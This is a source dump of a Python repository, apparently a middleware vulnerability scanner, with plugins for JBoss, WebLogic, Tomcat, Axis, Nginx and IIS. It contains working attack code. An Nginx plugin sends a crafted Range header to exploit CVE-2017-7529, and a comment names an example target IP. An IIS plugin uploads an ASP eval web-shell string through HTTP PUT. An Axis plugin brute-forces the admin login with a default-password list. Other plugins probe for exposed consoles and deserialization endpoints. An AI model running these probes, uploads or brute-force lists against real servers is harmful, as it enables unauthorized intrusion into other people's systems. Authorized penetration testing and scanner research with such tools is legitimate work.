├── _update.py ├── plugins ├── __init__.py ├── __pycache__ │ ├── plugins.cpython-37.pyc │ ├── __init__.cpython-37.pyc │ ├── user_agent.cpython-37.pyc │ ├── axis_plugin.cpython-37.pyc │ ├── jboss_plugin.cpython-37.pyc │ ├── resin_plugin.cpython-37.pyc │ ├── special_plugin_.cpython-37.pyc │ ├── struts2_plugin.cpython-37.pyc │ ├── tomcat_plugin.cpython-37.pyc │ ├── weblogic_plugin.cpython-37.pyc │ ├── glassfish_plugin.cpython-37.pyc │ ├── IIS_special_plugin_.cpython-37.pyc │ ├── Nginx_special_plugin_.cpython-37.pyc │ ├── jboss_special_plugin_.cpython-37.pyc │ ├── spring_special_plugin_.cpython-37.pyc │ ├── tomcat_special_plugin_.cpython-37.pyc │ ├── struts2_special_plugin_.cpython-37.pyc │ └── weblogic_special_plugin_.cpython-37.pyc ├── weblogic_poc │ ├── __pycache__ │ │ ├── __init__.cpython-37.pyc │ │ ├── uddi_ssrf.cpython-37.pyc │ │ ├── CVE_2015_4852.cpython-37.pyc │ │ ├── CVE_2016_0638.cpython-37.pyc │ │ ├── CVE_2016_3510.cpython-37.pyc │ │ ├── CVE_2017_3248.cpython-37.pyc │ │ ├── CVE_2017_3506.cpython-37.pyc │ │ ├── CVE_2018_2628.cpython-37.pyc │ │ ├── CVE_2018_2893.cpython-37.pyc │ │ └── managerURL200.cpython-37.pyc │ ├── __init__.py │ ├── uddi_ssrf.py │ ├── managerURL200.py │ ├── CVE_2017_3506.py │ ├── CVE_2018_2628.py │ ├── CVE_2018_2893.py │ ├── CVE_2017_3248.py │ ├── CVE_2016_0638.py │ ├── CVE_2016_3510.py │ └── CVE_2015_4852.py ├── README.md ├── CVE的原理分析网址处理脚本 │ ├── temp2.txt │ ├── deal.py │ ├── deal2.py │ └── temp.txt ├── poc模板.py ├── struts2_plugin.py ├── weblogic_plugin.py ├── tomcat_plugin.py ├── weblogic_exp │ ├── __init__.py │ ├── CVE_2017_10271_win.py │ ├── CVE_2018_2894.py │ ├── CVE_2017_10271_linux.py │ └── CVE_2018_2893.py ├── jboss_special_plugin_.py ├── Nginx_special_plugin_.py ├── special_plugin_.py ├── jboss_plugin.py ├── axis_plugin.py ├── IIS_special_plugin_.py ├── glassfish_plugin.py ├── weblogic_special_plugin_.py ├── spring_special_plugin_.py ├── resin_plugin.py ├── tomcat_special_plugin_.py ├── plugins.py └── user_agent.py ├── urls.txt ├── .gitattributes ├── test.py ├── __pycache__ └── config.cpython-37.pyc ├── .idea ├── inspectionProfiles │ └── profiles_settings.xml ├── misc.xml ├── modules.xml ├── N-MiddlewareScan.iml └── workspace.xml ├── old_plugins ├── plugins.py ├── axis.py ├── glassfish.py └── user_agent.py ├── config.py ├── Github_README_deal.py ├── N-MiddlewareScan.py └── README.md /_update.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /plugins/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /urls.txt: -------------------------------------------------------------------------------- 1 | https://www.baidu.com 2 | https://www.qq.com -------------------------------------------------------------------------------- /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /test.py: -------------------------------------------------------------------------------- 1 | import re 2 | url="https://baidu.comas.as" 3 | if re.match(r"{2}\w.+$", url): 4 | print("aaaaaaa") -------------------------------------------------------------------------------- /__pycache__/config.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/__pycache__/config.cpython-37.pyc -------------------------------------------------------------------------------- /plugins/__pycache__/plugins.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/__pycache__/plugins.cpython-37.pyc -------------------------------------------------------------------------------- /plugins/__pycache__/__init__.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/__pycache__/__init__.cpython-37.pyc -------------------------------------------------------------------------------- /plugins/__pycache__/user_agent.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/__pycache__/user_agent.cpython-37.pyc -------------------------------------------------------------------------------- /plugins/__pycache__/axis_plugin.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/__pycache__/axis_plugin.cpython-37.pyc -------------------------------------------------------------------------------- /plugins/__pycache__/jboss_plugin.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/__pycache__/jboss_plugin.cpython-37.pyc -------------------------------------------------------------------------------- /plugins/__pycache__/resin_plugin.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/__pycache__/resin_plugin.cpython-37.pyc -------------------------------------------------------------------------------- /plugins/__pycache__/special_plugin_.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/__pycache__/special_plugin_.cpython-37.pyc -------------------------------------------------------------------------------- /plugins/__pycache__/struts2_plugin.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/__pycache__/struts2_plugin.cpython-37.pyc -------------------------------------------------------------------------------- /plugins/__pycache__/tomcat_plugin.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/__pycache__/tomcat_plugin.cpython-37.pyc -------------------------------------------------------------------------------- /plugins/__pycache__/weblogic_plugin.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/__pycache__/weblogic_plugin.cpython-37.pyc -------------------------------------------------------------------------------- /plugins/__pycache__/glassfish_plugin.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/__pycache__/glassfish_plugin.cpython-37.pyc -------------------------------------------------------------------------------- /plugins/__pycache__/IIS_special_plugin_.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/__pycache__/IIS_special_plugin_.cpython-37.pyc -------------------------------------------------------------------------------- /plugins/__pycache__/Nginx_special_plugin_.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/__pycache__/Nginx_special_plugin_.cpython-37.pyc -------------------------------------------------------------------------------- /plugins/__pycache__/jboss_special_plugin_.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/__pycache__/jboss_special_plugin_.cpython-37.pyc -------------------------------------------------------------------------------- /plugins/__pycache__/spring_special_plugin_.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/__pycache__/spring_special_plugin_.cpython-37.pyc -------------------------------------------------------------------------------- /plugins/__pycache__/tomcat_special_plugin_.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/__pycache__/tomcat_special_plugin_.cpython-37.pyc -------------------------------------------------------------------------------- /plugins/weblogic_poc/__pycache__/__init__.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/weblogic_poc/__pycache__/__init__.cpython-37.pyc -------------------------------------------------------------------------------- /plugins/weblogic_poc/__pycache__/uddi_ssrf.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/weblogic_poc/__pycache__/uddi_ssrf.cpython-37.pyc -------------------------------------------------------------------------------- /plugins/__pycache__/struts2_special_plugin_.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/__pycache__/struts2_special_plugin_.cpython-37.pyc -------------------------------------------------------------------------------- /plugins/__pycache__/weblogic_special_plugin_.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/__pycache__/weblogic_special_plugin_.cpython-37.pyc -------------------------------------------------------------------------------- /plugins/weblogic_poc/__pycache__/CVE_2015_4852.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/weblogic_poc/__pycache__/CVE_2015_4852.cpython-37.pyc -------------------------------------------------------------------------------- /plugins/weblogic_poc/__pycache__/CVE_2016_0638.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/weblogic_poc/__pycache__/CVE_2016_0638.cpython-37.pyc -------------------------------------------------------------------------------- /plugins/weblogic_poc/__pycache__/CVE_2016_3510.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/weblogic_poc/__pycache__/CVE_2016_3510.cpython-37.pyc -------------------------------------------------------------------------------- /plugins/weblogic_poc/__pycache__/CVE_2017_3248.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/weblogic_poc/__pycache__/CVE_2017_3248.cpython-37.pyc -------------------------------------------------------------------------------- /plugins/weblogic_poc/__pycache__/CVE_2017_3506.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/weblogic_poc/__pycache__/CVE_2017_3506.cpython-37.pyc -------------------------------------------------------------------------------- /plugins/weblogic_poc/__pycache__/CVE_2018_2628.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/weblogic_poc/__pycache__/CVE_2018_2628.cpython-37.pyc -------------------------------------------------------------------------------- /plugins/weblogic_poc/__pycache__/CVE_2018_2893.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/weblogic_poc/__pycache__/CVE_2018_2893.cpython-37.pyc -------------------------------------------------------------------------------- /plugins/weblogic_poc/__pycache__/managerURL200.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/weblogic_poc/__pycache__/managerURL200.cpython-37.pyc -------------------------------------------------------------------------------- /.idea/inspectionProfiles/profiles_settings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 5 | -------------------------------------------------------------------------------- /plugins/README.md: -------------------------------------------------------------------------------- 1 | #plugins vuln poc exp 2 | 主要是下面模块: 3 | 1.axis 4 | xss 弱密码 5 | 2.glashfish 6 | 3.jboss 7 | 4.resin 8 | 5.weblogic 9 | 6.tomcat 10 | 7.struts2 11 | 8.IIS 12 | 9.fastcgi 13 | 10.phpcgi 14 | 11.apache 15 | 12.nginx 16 | 13.spring mvc 17 | 18 | -------------------------------------------------------------------------------- /plugins/CVE的原理分析网址处理脚本/temp2.txt: -------------------------------------------------------------------------------- 1 | CVE_2018_9158 2 | CVE_2018_9157 3 | CVE_2018_9156 4 | CVE_2018_8032 5 | CVE_2018_19334 6 | CVE_2018_10664 7 | CVE_2018_10663 8 | CVE_2018_10662 9 | CVE_2018_10661 10 | CVE_2018_10660 11 | CVE_2018_10659 12 | CVE_2018_10658 13 | CVE_2017_9765 14 | CVE_2017_15885 15 | CVE_2017_12413 -------------------------------------------------------------------------------- /plugins/poc模板.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | pocs=[ 3 | {"requests_option":"", 4 | "url":[], 5 | "params":[], 6 | "data":[], 7 | "flag":[], 8 | "success":"", 9 | "fail":"", 10 | "end":"", 11 | "admin_bursk":"", 12 | "username":[], 13 | "password":[], 14 | }, 15 | ] -------------------------------------------------------------------------------- /.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 6 | 7 | -------------------------------------------------------------------------------- /.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /plugins/struts2_plugin.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | pocs=[ 3 | {"requests_option":"", 4 | "url":[], 5 | "params":[], 6 | "data":[], 7 | "flag":[], 8 | "success":"", 9 | "fail":"", 10 | "end":"", 11 | "admin_bursk":"", 12 | "username":[], 13 | "password":[], 14 | }, 15 | ] -------------------------------------------------------------------------------- /plugins/weblogic_plugin.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | pocs=[ 3 | {"requests_option":"", 4 | "url":[], 5 | "params":[], 6 | "data":[], 7 | "flag":[], 8 | "success":"", 9 | "fail":"", 10 | "end":"", 11 | "admin_bursk":"", 12 | "username":[], 13 | "password":[], 14 | }, 15 | ] -------------------------------------------------------------------------------- /.idea/N-MiddlewareScan.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /plugins/tomcat_plugin.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | pocs=[ 3 | {"requests_option":"", 4 | "url":["/manager/html/upload"], 5 | "params":[], 6 | "data":[], 7 | "flag":[], 8 | "success":"", 9 | "fail":"", 10 | "end":"", 11 | "admin_bursk":"", 12 | "username":[], 13 | "password":[], 14 | }, 15 | ] -------------------------------------------------------------------------------- /plugins/CVE的原理分析网址处理脚本/deal.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | with open("temp.txt",encoding="utf-8") as f: 3 | for i in f.readlines(): 4 | i=i.rstrip("\n").split(" ")[0] 5 | i=i.replace("-","_") 6 | #i="def "+i+"(url):\n"+" "+"headers = {'User-Agent': get_user_agent()}" 7 | #print(i+"(url)") 8 | print(i) 9 | f.close() 10 | -------------------------------------------------------------------------------- /plugins/weblogic_poc/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | 10 | ''' 11 | -------------------------------------------------------------------------------- /plugins/weblogic_exp/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | 10 | ''' 11 | -------------------------------------------------------------------------------- /old_plugins/plugins.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | import sys 3 | sys.path.append("plugins") 4 | from axis import axis 5 | from glassfish import glassfish 6 | from resin import resin 7 | class plugins(object): 8 | def __init__(self,url,options): 9 | self.url=url 10 | self.options=options 11 | def run(self): 12 | axis(self.url) 13 | glassfish(self.url) 14 | resin(self.url) 15 | #others 16 | 17 | 18 | -------------------------------------------------------------------------------- /config.py: -------------------------------------------------------------------------------- 1 | ThreadNum=50 2 | Process=30 3 | Timeout=6 4 | port=80 5 | #linux 6 | ''' 7 | RED = '\x1b[91m' 8 | RED1 = '\033[31m' 9 | BLUE = '\033[94m' 10 | GREEN = '\033[32m' 11 | BOLD = '\033[1m' 12 | NORMAL = '\033[0m' 13 | ENDC = '\033[0m' 14 | ''' 15 | 16 | RED = '\033[31m' # 红色 17 | GREEN = '\033[32m' # 绿色 18 | YELLOW = '\033[33m' # 黄色 19 | BLUE = '\033[34m' # 蓝色 20 | FUCHSIA = '\033[35m' # 紫红色 21 | CYAN = '\033[36m' # 青蓝色 22 | WHITE = '\033[37m' # 白色 23 | -------------------------------------------------------------------------------- /.idea/workspace.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /Github_README_deal.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import os 3 | 4 | def re_README(file): 5 | f = open(file, encoding="utf-8") 6 | urls = [] 7 | for i in f.readlines(): 8 | i = i.strip("\n").strip(" ") 9 | i = i + " " + "\n" 10 | urls.append(i) 11 | f.close() 12 | 13 | with open(file, "w+", encoding="utf-8") as f: 14 | for i in urls: 15 | f.write(i) 16 | f.close() 17 | def list_file(dir_name): 18 | files=os.listdir(dir_name) 19 | new_file=os.path.abspath(dir_name) 20 | for file in files: 21 | file=new_file+"\\"+file 22 | if os.path.isdir(file): 23 | list_file(file) 24 | #print(file) 25 | elif "README.md" in file: 26 | print(file) 27 | re_README(file) 28 | 29 | dir_name=os.path.dirname(__file__) 30 | print(dir_name) 31 | list_file(dir_name) 32 | 33 | 34 | 35 | -------------------------------------------------------------------------------- /plugins/CVE的原理分析网址处理脚本/deal2.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | import requests 3 | import re 4 | from concurrent.futures import ThreadPoolExecutor 5 | import traceback 6 | ''' 7 | s=requests.get(url="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9158") 8 | s=s.text 9 | s=re.findall("MISC:http.*",s)[0].rstrip("").lstrip("MISC") 10 | print(s) 11 | ''' 12 | def requests_url(cve): 13 | try: 14 | url = "http://cve.mitre.org/cgi-bin/cvename.cgi?name=" + cve 15 | s = requests.get(url=url) 16 | s = s.text 17 | s = re.findall("MISC:http.*", s)[0].rstrip("").lstrip("MISC:") 18 | print(s) 19 | except Exception: 20 | print(traceback.print_exc()) 21 | 22 | 23 | with open("temp2.txt") as f: 24 | for i in f.readlines(): 25 | name = i.rstrip("\n") 26 | with ThreadPoolExecutor(40) as excetor: 27 | excetor.submit(requests_url(name)) 28 | f.close() 29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /plugins/jboss_special_plugin_.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | import requests 3 | import sys 4 | import socket 5 | def CVE_2017_12149(arg,config): 6 | try: 7 | port = 8080 8 | ip = socket.gethostbyname(arg.url.strip("http://").strip("https://")) 9 | url = 'http://{}:{}/invoker/JMXInvokerServlet'.format(ip, port) 10 | headers = { 11 | "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"} 12 | r = requests.get( 13 | url, headers=headers, timeout=10, allow_redirects=False) 14 | if r.status_code == 200: 15 | if r.headers['content-type'].count('serialized') or r.headers['Content-Type'].count('serialized'): 16 | print('[ok] -> {}:{}'.format(ip, port)) 17 | else: 18 | print("不存在 CVE_2017_12149 反序列化漏洞") 19 | except Exception: 20 | print("CVE_2017_12149 检测函数出错") 21 | def jboss_special_plugin_(arg,config): 22 | CVE_2017_12149(arg,config) 23 | 24 | -------------------------------------------------------------------------------- /plugins/Nginx_special_plugin_.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | # Nginx信息泄露!python3 NginxCVE-2017-7529.py http://207.246.80.61:8000/proxy/demo.png 3 | # 敏感信息有KEY等等 4 | import requests 5 | from termcolor import cprint 6 | 7 | class NginxCVE_2017_7529(): 8 | def attack(self, url): 9 | #url = r'http://207.246.80.61:8000/' 10 | try: 11 | a = requests.get(url) 12 | start = int(a.headers['Content-Length']) + 300 13 | end = 0x8000000000000000 - start 14 | 15 | headers = { 16 | "Range": "bytes=-{},-{}".format(start, end) 17 | } 18 | res = requests.get(url=url, headers=headers, stream=True, timeout=10) 19 | ret = res.raw.read(500) 20 | code = res.status_code 21 | 22 | if code == 206: 23 | print( "[+]存在Nginx越界读取缓存漏洞(CVE-2017-7529)漏洞...(低危)") 24 | else: 25 | print("[-]不存在Nginx越界读取缓存漏洞(CVE-2017-7529)漏洞...(低危)") 26 | except Exception as e: 27 | cprint("[-] " + __file__ + "====>连接超时", "cyan") 28 | 29 | def Nginx_special_plugin_(arg,config): 30 | NginxCVE_2017_7529().attack(arg.url) -------------------------------------------------------------------------------- /plugins/weblogic_poc/uddi_ssrf.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | 10 | ''' 11 | import sys 12 | import requests 13 | 14 | headers = {'user-agent': 'ceshi/0.0.1'} 15 | 16 | def islive(ur,port): 17 | url='http://' + str(ur)+':'+str(port)+'/uddiexplorer/' 18 | r = requests.get(url, headers=headers) 19 | # print(url,r.status_code) 20 | return r.status_code 21 | 22 | def run(url,port): 23 | try: 24 | if islive(url, port) == 200: 25 | print(('[+]目标weblogic存在UDDI组件!\n[+]路径为:{}\n[+]请自行验证SSRF漏洞!'.format( 26 | 'http://' + str(url) + ':' + str(port) + '/uddiexplorer/'))) 27 | else: 28 | print("[-]目标weblogic UDDI组件默认路径不存在!") 29 | except Exception: 30 | print("uudi_ssrf脚本出错") 31 | 32 | if __name__=="__main__": 33 | url = sys.argv[1] 34 | port = int(sys.argv[2]) 35 | run(url,port) -------------------------------------------------------------------------------- /plugins/weblogic_poc/managerURL200.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | 10 | ''' 11 | import sys 12 | import requests 13 | 14 | headers = {'user-agent': 'ceshi/0.0.1'} 15 | 16 | def islive(ur,port): 17 | url='http://' + str(ur)+':'+str(port)+'/console/login/LoginForm.jsp' 18 | r = requests.get(url, headers=headers) 19 | return r.status_code 20 | 21 | def run(url,port): 22 | try: 23 | if islive(url, port) == 200: 24 | u = 'http://' + str(url) + ':' + str(port) + '/console/login/LoginForm.jsp' 25 | print(("[+]目标weblogic控制台地址暴露!\n[+]路径为:{}\n[+]请自行尝试弱口令爆破!".format(u))) 26 | else: 27 | print("[-]目标weblogic控制台地址未找到!") 28 | except Exception: 29 | print("managerURL200脚本出错") 30 | 31 | if __name__=="__main__": 32 | url = sys.argv[1] 33 | port = int(sys.argv[2]) 34 | run(url,port) 35 | # run('127.0.0.1',7001) -------------------------------------------------------------------------------- /plugins/special_plugin_.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | import threading 3 | import sys 4 | sys.path.append("plugin") 5 | from plugins.tomcat_special_plugin_ import tomcat_special_plugin_ 6 | from plugins.weblogic_special_plugin_ import weblogic_special_plugin_ 7 | from plugins.struts2_special_plugin_ import struts2_special_plugin_ 8 | from plugins.jboss_special_plugin_ import jboss_special_plugin_ 9 | from plugins.spring_special_plugin_ import spring_special_plugin_ 10 | from plugins.IIS_special_plugin_ import IIS_special_plugin_ 11 | from plugins.Nginx_special_plugin_ import Nginx_special_plugin_ 12 | def special_plugin_(arg,config): 13 | threads=[] 14 | threads.append(threading.Thread(tomcat_special_plugin_(arg,config))) 15 | threads.append(threading.Thread(weblogic_special_plugin_(arg,config))) 16 | threads.append(threading.Thread(jboss_special_plugin_(arg,config))) 17 | threads.append(threading.Thread(struts2_special_plugin_(arg, config))) 18 | threads.append(threading.Thread(spring_special_plugin_(arg,config))) 19 | threads.append(threading.Thread(IIS_special_plugin_(arg,config))) 20 | threads.append(threading.Thread(Nginx_special_plugin_(arg,config))) 21 | for thread in threads: 22 | try: 23 | thread.start() 24 | except Exception as e: 25 | pass 26 | for t in threads: 27 | t.join() 28 | 29 | -------------------------------------------------------------------------------- /plugins/jboss_plugin.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | pocs=[ 3 | {"requests_option":"GET", 4 | "url":["/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo"], 5 | "params":[], 6 | "data":[], 7 | "flag":[], 8 | "success":"/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo", 9 | "fail":"", 10 | "end":"/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo 扫描完成", 11 | "admin_bursk":"", 12 | "username":[], 13 | "password":[], 14 | }, 15 | {"requests_option":"GET", 16 | "url":["/web-console/Invoker"], 17 | "params":[], 18 | "data":[], 19 | "flag":[], 20 | "success":"/web-console/Invoker", 21 | "fail":"", 22 | "end":"/web-console/Invoker 扫描完成", 23 | "admin_bursk":"", 24 | "username":[], 25 | "password":[], 26 | }, 27 | {"requests_option":"GET", 28 | "url":["/invoker/JMXInvokerServlet"], 29 | "params":[], 30 | "data":[], 31 | "flag":[], 32 | "success":"/invoker/JMXInvokerServlet", 33 | "fail":"", 34 | "end":"/invoker/JMXInvokerServlet 扫描完成", 35 | "admin_bursk":"", 36 | "username":[], 37 | "password":[], 38 | }, 39 | {"requests_option":"GET", 40 | "url":["/admin-console/"], 41 | "params":[], 42 | "data":[], 43 | "flag":[], 44 | "success":"/admin-console/", 45 | "fail":"", 46 | "end":"/admin-console/ 扫描完成", 47 | "admin_bursk":"", 48 | "username":[], 49 | "password":[], 50 | }, 51 | ] 52 | 53 | 54 | -------------------------------------------------------------------------------- /plugins/axis_plugin.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | pocs=[ 3 | {"requests_option":"GET", 4 | "url":["/index.html/a.srv"], 5 | "params":[], 6 | "data":["action=abc&return_page=it_worked"], 7 | "flag":["it_worked"], 8 | "success":"exist CVE_2018_10661", 9 | "fail":"Not exist CVE_2018_10661", 10 | "end":"CVE_2018_10661 测试结束", 11 | "admin_bursk":"", 12 | "username":'', 13 | "password":"", 14 | }, 15 | {"requests_option":"GET", 16 | "url":["/axis2/axis2-web/HappyAxis.jsp"], 17 | "params":[], 18 | "data":[], 19 | "flag":["Axis2 Happiness Page"], 20 | "success":"exist Axis Information Disclosure,/axis2/axis2-web/HappyAxis.jsp", 21 | "fail":"NOT exist /axis2/axis2-web/HappyAxis.jsp", 22 | "end":"/axis2/axis2-web/HappyAxis.jsp信息扫描完成", 23 | "admin_bursk":"", 24 | "username":'', 25 | "password":"", 26 | }, 27 | {"requests_option":"POST", 28 | "url":["/axis2/axis2-admin/login"], 29 | "params":[], 30 | "data":["userName=%s&password=%s&submit=+Login+"], 31 | "flag":['Administration Page', 'System Components', 'axis2-admin/upload','include page=\'footer.inc\'>', 'axis2-admin/logout'], 32 | "success":"/axis2/axis2-admin/login存在弱口令", 33 | "fail":"/axis2/axis2-admin/login不存在弱口令", 34 | "end":"/axis2/axis2-admin/login弱口令扫描完成", 35 | "admin_bursk":"True", 36 | "username":['axis_plugin_catalog', 'admin', 'manager', 'root'], 37 | "password":['', 'axis_plugin_catalog', 'axis2', '123456', '12345678', 'password', '123456789', 'admin123', 'admin888', 'admin1', 'administrator', '8888888', '123123', 'admin', 'manager', 'root'], 38 | }, 39 | ] -------------------------------------------------------------------------------- /plugins/IIS_special_plugin_.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | import requests 3 | import sys 4 | import http.client 5 | import urllib.parse 6 | import threading 7 | import queue 8 | import time 9 | def IIS_PUT(arg,config): 10 | try: 11 | url = arg.url 12 | data = '<%eval request("1111111111")%>' 13 | res = requests.put(url=url, data=data, timeout=5) 14 | html_text = requests.get(url).text 15 | if '<%eval request("1111111111")%>' in html_text: 16 | print(('[+] {} 存在IIS PUT上传'.format(url))) 17 | requests.delete(url) 18 | print(('[+] {} 成功删除测试文件'.format(url))) 19 | else: 20 | print(('[-] {} 不存在IIS PUT上传'.format(url))) 21 | except Exception as e: 22 | print(e) 23 | 24 | def IIS_shortname_Scanner(url): 25 | try: 26 | for _method in ['GET', 'OPTIONS']: 27 | if _method == 'GET': 28 | status_1 = requests.get(url+ '/*~1*/a.aspx') # an existed file/folder 29 | status_2 = requests.get(url + '/l1j1e*~1*/a.aspx') # not existed file/folder 30 | else: 31 | status_1 = requests.options(url + '/*~1*/a.aspx') # an existed file/folder 32 | status_2 = requests.options(url + '/l1j1e*~1*/a.aspx') # not existed file/folder 33 | if status_1.status_code == 404 and status_2.status_code != 404: 34 | print("Server 存在 IIS shortname vulnerable") 35 | else: 36 | print("Server 不存在 IIS shortname vulnerable") 37 | return False 38 | except Exception as e: 39 | raise Exception('[is_vul.Exception] %s' % str(e)) 40 | def IIS_special_plugin_(arg,config): 41 | try: 42 | IIS_PUT(arg,config) 43 | IIS_shortname_Scanner(arg.url) 44 | except Exception: 45 | pass -------------------------------------------------------------------------------- 